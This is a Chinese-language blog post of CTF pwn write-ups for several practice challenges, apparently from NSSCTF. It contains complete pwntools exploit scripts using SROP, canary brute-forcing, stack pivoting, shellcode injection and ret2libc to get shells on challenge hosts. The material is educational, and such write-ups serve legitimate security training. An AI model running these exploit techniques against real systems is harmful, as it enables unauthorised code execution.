第二周 pwn的wp

已于 2024-03-24 20:45:53 修改
阅读量409 收藏 8
点赞数 3
分类专栏: 精华刷题集_pwn 文章标签: 安全 网络安全 linux
于 2024-03-24 20:44:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73858054/article/details/136994696
版权

[CISCN 2019华南]PWN3

$ checksec pwn3
[!] Could not populate PLT: module 'unicorn' has no attribute 'UC_ARCH_RISCV'
[*] '/home/xunan/桌面/Pwn/pwn3'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

signed __int64 vuln()
{
  signed __int64 v0; // rax
  char buf[16]; // [rsp+0h] [rbp-10h] BYREF

  v0 = sys_read(0, buf, 0x400uLL);
  return sys_write(1u, buf, 0x30uLL);
}

​ 仅开启栈不可执行保护,一次read,一次write,可泄露栈地址
​ 又发现gadgets: .text:00000000004004DA mov rax, 0Fh 64位系统,很显然是SROP。

​ 由于第一次写SROP稍微介绍下原理,SROP就是利用系统中断到恢复时会在用户空间中保存和恢复上下文,并且由于内核和信号处理程序是相互分离的,为进程恢复时不会检查该 Signal Frame 是否属于该进程,也就是说可以伪造。
​ 利用时需要控制 rax 寄存器,并且执行 syscall ,同时还要有足够大小的已知位置可以用来存放伪造的 sigcontext

​ 上文中我们已知可控制 rax 寄存器的 gadgets ,并且有函数可以泄露栈地址,所以我们还需要再用 ROPgadget 搜索 syscallretret 是为了保证栈对齐的(可能用不到,但要有)。

$ ROPgadget --binary pwn3 --only "syscall|ret"
Gadgets information
============================================================
0x00000000004003a9 : ret
0x0000000000400501 : syscall

Unique gadgets found: 2

值得一提的是,pwntools中集成了SROP,最后看一下exp:

from pwn import *
from LibcSearcher import LibcSearcher
# context(os='linux',arch='i386',log_level='debug')
context(os='linux',arch='amd64',log_level='debug')
sh = process('./pwn3')

def debug(p):
	gdb.attach(p,"b *0x400503")
def end(p):
	p.interactive()

vuln_addr = 0x4004F1
syscall_ret = 0x400517
rax_0xf_ret = 0x4004da
ret_addr = 0x4003a9
# get binsh_addr
payload = b'/bin/sh\x00'.ljust(0x10,b'a') + p64(vuln_addr) 
sh.sendline(payload)
stack_addr = u64(sh.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
log.info("binsh_addr-->0x%x" %stack_addr)
sigframe = SigreturnFrame()
sigframe.rax = 59
sigframe.rdi = stack_addr - 0x128
sigframe.rsi = 0
sigframe.rdx = 0
sigframe.rip = syscall_ret
payload = b'a'*0x10 + p64(rax_0xf_ret) + p64(syscall_ret)  + flat(sigframe)
sh.sendline(payload)
sh.interactive()

​ 值得一提的是,本题中padding仅覆盖到了栈结束的位置,没有如往常一样覆盖 bp 寄存器。这里讲解一下,这是由于调用write函数的方式不同造成的,看下列汇编代码

.text:0000000000400517                 syscall                 ; LINUX - sys_write
.text:0000000000400519                 retn
.text:0000000000400519 vuln            endp ; sp-analysis failed
.text:0000000000400519
.text:0000000000400519 ; ---------------------------------------------------------------------------
.text:000000000040051A                 db 90h
.text:000000000040051B ; ---------------------------------------------------------------------------
.text:000000000040051B                 pop     rbp
.text:000000000040051C                 retn
.text:000000000040051C ; } // starts at 4004ED

可以看到,0x400519处显示 sp指针定位错误,这是由于IDA在反汇编时将retn当做函数返回导致的,实际的函数返回在0x40051c处。第一处的retn其实是通过retn进行函数调用,我们的溢出点就在这里,所以我们才可以在挟持程序流的同时泄露栈位置。

​ 另外就是伪造的 sigcontext 的rdi指针,那个 栈地址到binsh字符串的偏移是要自己算的。

大体上就是这些了,本来还想着就 retn 处直接挟持程序流写一篇博客来着,现在看来可能也不是那么需要。(千万不要迷醉于流量陷阱!)

[CISCN 2023 初赛]funcanary

签到题,但是很搞笑,用frok不断创建新进程,所以一直都在执行所以这道题要爆破出canary和 backdoor 位置。

$ checksec service
[!] Could not populate PLT: module 'unicorn' has no attribute 'UC_ARCH_RISCV'
[*] '/home/xunan/桌面/Pwn/service'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

from pwn import *
#p = process('./service')
p=remote('node5.anna.nssctf.cn',28406)
p.recvuntil('welcome\n')
canary = b'\x00'
for k in range(7):
    for i in range(256):
        p.send(b'a'*0x68 + canary + p8(i))
        a = p.recvuntil("welcome\n")
        if b"fun" in a:
                canary += p8(i)
                print(b"canary: " + canary)
                break               

while(1):
    catflag = 0x0231
    for i in range(16):
        payload = b'A' * 0x68 + canary + b'A' * 8 + p16(catflag)
        p.send(payload)
        #pause()s
        a = p.recvuntil("welcome\n",timeout=1)
        print(a)
        if b"welcome" in a:
                catflag += 0x1000
                continue
        if b"NSSCTF" in a:
            print(a)
            break
p.interactive()

[CISCN 2019华南]PWN4

32位的栈迁移,很标准,所以还是签到题

$ checksec pwn4
[!] Could not populate PLT: module 'unicorn' has no attribute 'UC_ARCH_RISCV'
[*] '/home/xunan/桌面/Pwn/pwn4'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

from pwn import *
from LibcSearcher import LibcSearcher
# context(os='linux',arch='i386',log_level='debug')
sh = process('./pwn4')
sh = remote("node5.anna.nssctf.cn",29000)

def end(p):
	p.interactive()

# get buf_addr
sh.send(b'a'*0x28)
sh.recvuntil(b'a'*0x28)
buf_addr = u32(sh.recv(4))-0x38
log.info("buf_addr ==> 0x%x" %buf_addr)

# get shell
leave_ret = 0x08048562
ret_addr = 0x080483a6
call_system = 0x08048559
payload = b'a'*0x4 + p32(call_system) + p32(buf_addr+0x10) + b'a'*0x4 + b'/bin/sh\0'
payload = payload.ljust(0x28,b'a') + p32(buf_addr) + p32(leave_ret)
sh.send(payload)

end(sh)

[CISCN 2019华北]PWN5

我你这他…纯签到

$ checksec pwn5
[!] Could not populate PLT: module 'unicorn' has no attribute 'UC_ARCH_RISCV'
[*] '/home/xunan/桌面/Pwn/pwn5'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments

from pwn import *
from LibcSearcher import LibcSearcher
# context(os='linux',arch='i386',log_level='debug')
context(os='linux',arch='amd64',log_level='debug')
sh = process('./pwn5')
sh = remote('node4.anna.nssctf.cn',28407)
shellcode=asm(shellcraft.amd64.sh())
sh.sendafter(b'tell me your name',shellcode)
payload = b'a'*0x28 + p64(0x601080)
sh.sendlineafter(b'What do you want to say to me?',payload)
sh.interactive()

ps: 怎么这么多签到?

$ checksec pwn6
[!] Could not populate PLT: module 'unicorn' has no attribute 'UC_ARCH_RISCV'
[*] '/home/xunan/桌面/Pwn/pwn6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

libc 板子题,就是我发现我的elf.plt[‘’]用不了,不知道为什么

[LitCTF 2023]狠狠的溢出涅~

找一道libc题凑个数,呜呜每周五道写不完

from pwn import *
from LibcSearcher import LibcSearcher
context(os='linux',arch='amd64',log_level='debug')
sh = process('./pwn6')

def debug(p):
	gdb.attach(p)
def libc(sym):
	# get libc
	puts_plt = 0x400570
	puts_got = 0x601018
	rdi_ret = 0x4007d3
	ret_addr = 0x400556
	main_addr = 0x4006B0
	padding = b'\x00'*0x68
	payload = flat([padding,rdi_ret,puts_got,puts_plt,main_addr])
	sh.sendlineafter(b'message:\n',payload)
	# get system&binsh
	addr = u64(sh.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
	libc = LibcSearcher(sym, addr)
	libc_base = addr - libc.dump(sym)
	system_addr = libc_base + libc.dump('system')
	binsh_addr = libc_base + libc.dump('str_bin_sh')
	log.info(sym+"addr-->0x%x" %addr)
	log.info("system_addr-->0x%x" %system_addr)
	log.info("binsh_addr-->0x%x" %binsh_addr)
	return (system_addr,binsh_addr)
def end(p):
	p.interactive()
rdi_ret = 0x4007d3
ret_addr = 0x400556
(system_addr,binsh_addr)=libc('puts')
payload = flat([b'\x00'*0x68,ret_addr,rdi_ret,binsh_addr,system_addr])
sh.sendlineafter(b'message:\n',payload)
sh.interactive()

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

# p = process(['./pwn4'])
p = remote('node4.anna.nssctf.cn', 28223)
elf = ELF('./pwn4')
libc = ELF('./libc-2.31.so')

rop = ROP('./pwn4')
print(hex(rop.rdi.address))
payload = flat(
    [b'\x00', cyclic(0x60 + 0x08 - 0x01), rop.rdi.address, elf.got['puts'], elf.plt['puts'], elf.sym['main']])
p.sendlineafter(b'Leave your message:\n', payload)
p.recvuntil(b'Ok,Message Received\n')
puts_addr = u64(p.recvuntil(b'\x7f').ljust(8, b'\x00'))

libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
str_bin_sh = libc_base + next(libc.search(b'/bin/sh\x00'))

payload = flat([b'\x00', cyclic(0x60 + 0x08 - 0x01), rop.ret.address, rop.rdi.address, str_bin_sh, system_addr, 0])
p.sendlineafter(b'Leave your message:\n', payload)

p.interactive()
进击的萝卜君
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
Pwnwp
weixin_52553215的博客
11-22 686
如%100×10$n 表示将 0x64 写入偏移 10 处保存的指针所指向的地址(4字节),而$hn 表示写入的地址空间为 2 字节,$hhn 表示写入的地址空间为 1字节,%$lln 表示写入的地址空间为 8 字节,在 32bit 和 64bit 环境下一样。猜测 0x40060d 这个地址是个函数,运行这个函数可以直接拿到 flag,那我们只需要去不断的填充垃圾数据,然后在后面加个给的地址(也可能是不加,分情况讨论),不断尝试,直到把这个地址填充到返回地址的位置。
2023CISCN—华中赛区—pwn wp
m0_63437215的博客
07-13 972
ciscn2023华中赛区pwn
NKCTF2023 pwn wp
S4n_v1的博客
03-31 772
NKCTF2023 pwn....
SCU新生赛2021 pwn wp
N1rvana的博客
11-29 4242
前段时间的极客大挑战2021和2021年的SCU新生赛,最后一道题都没有做出来,作为一枚大二学长确实应该反省一下自己了。太菜了呜呜呜。极客大挑战因为打太久了,题目都快忘记了,就不写wp了。 ret2text 简单的栈溢出,pwn里的hello world。 from pwn import * r = process("/mnt/hgfs/ubuntu/stackoverflow") elf = ELF("/mnt/hgfs/ubuntu/stackoverflow") payload = b'a'*0x3
BUUCTF pwn wp 116 - 120
fa1c4的blog
03-06 389
[BSidesCF 2019]Runit [BSidesCF 2019]Runit$ file runit;checksec runit runit: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fdd5061644dc69c2e4f2a0e98091901b4
pwn】2022 祥云杯 部分wp
woodwhale的博客
10-31 1150
2022 祥云杯 pwn 部分wp,有空复现别的题目
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2125
2022 CISCN 初赛pwn的完整wp
BUUCTF之PWN(WP1)
NANMUZN的博客
01-15 600
buuctf pwn
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
welpwn pwn 入门题
02-11
pwn 入门题
2024NKCTF-pwn
03-25
2024NKCTF_pwn
解锁Nginx跨域谜题:3步打造安全高效的CORS策略
2401_85000826的博客
05-16 410
Nginx作为一款强大的Web服务器和反向代理服务器,经常被用于处理跨域资源共享(CORS,Cross-Origin Resource Sharing)策略,以允许或限制不同源之间的资源请求。CORS是一种安全策略,用于决定Web浏览器是否应允许从一个域名加载的网页访问另一个域名下的资源。下面将深入解析如何在Nginx配置中实现对origin(请求来源)的限制,以精确控制跨域请求。
软考高级架构师:软件系统安全相关概念完整性、不可否认性、可控性、机密性、安全审计
最新发布
明明如月的技术博客
05-19 139
了解软件系统安全的几个重要概念:完整性、不可否认性、可控性、机密性和安全审计,可以通过一些日常生活中的例子来帮助理解。
【容联云通讯注册/登录安全分析报告-Ajax泄漏滑动距离导致安全隐患】
05-16 1192
容联云通讯致力于为全球客户提供领先的智能通讯与营销科技服务,应该是通讯行业的独角兽,并且在美国上市,据了解,容联云通讯在早期使用的网易易盾的滑动验证码,但本次测评时,不知道为何换成自己研发的了, 1 缺钱 ,2 觉得第三方的不安全?不管哪种原因,总之是换成自己的了,并且出现这么严重的低级问题!在业界面前被打脸, 对比起自己作为高科技企业的地位!很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“
讲解一下pwn 2019第五空间
04-02
Pwn 2019第五空间是一场CTF比赛中的一道题目。该题目为二进制漏洞利用类题目,需要利用二进制程序中的漏洞进行攻击,获取程序的控制权。 该题目中提供了一个二进制文件,玩家需要对该文件进行分析,找出其中的漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值